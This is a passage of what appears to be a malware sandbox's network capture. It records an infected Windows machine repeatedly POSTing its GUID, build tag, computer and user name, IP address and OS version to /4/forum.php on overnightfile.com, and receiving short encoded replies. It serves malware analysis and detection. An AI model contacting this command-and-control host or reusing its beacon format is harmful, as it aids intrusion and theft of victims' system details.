                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:07.690946102 CEST897INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:07 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4a 4d 4e 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cJMNQARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:08.014770985 CEST898OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:08.102183104 CEST898INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:07 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 43 51 4a 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cCQJXARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:08.406220913 CEST899OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:08.494173050 CEST899INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:08 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 4b 50 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZKPAARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:08.816091061 CEST899OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:08.903805017 CEST899INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:08 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 4b 50 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZKPAARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:09.197422981 CEST900OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:09.287599087 CEST900INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:08 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 42 4e 4d 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cBNMYARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:09.590527058 CEST901OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:09.682044029 CEST901INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:09 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4d 4a 51 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cMJQNARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:10.301146030 CEST901OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:10.389384031 CEST902INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:09 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 51 56 45 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cQVEJARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:10.741204023 CEST902OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:10.832273006 CEST902INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:10 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 4a 51 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZJQAARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:11.658440113 CEST903OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:11.747596025 CEST903INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:11 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 48 53 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZHSAARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:12.201524973 CEST903OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:12.292340040 CEST904INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:11 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 51 59 42 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cQYBJARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:13.004404068 CEST904OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:13.092058897 CEST904INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:12 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 43 58 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZCXAARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:13.399946928 CEST905OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:13.490073919 CEST905INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:13 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 54 48 53 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cTHSGARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:13.793641090 CEST906OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:13.883595943 CEST906INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:13 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4e 48 53 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cNHSMARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:14.181653023 CEST906OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:14.269927025 CEST907INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:13 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 42 59 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZBYAARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:14.571012974 CEST907OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:14.658760071 CEST907INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:14 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 47 5a 41 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cGZATARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:14.983218908 CEST908OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:15.075644016 CEST908INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:14 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 56 45 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZVEAARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:15.396648884 CEST908OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:15.490426064 CEST909INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:15 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 42 47 54 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cBGTYARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:15.789973021 CEST909OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
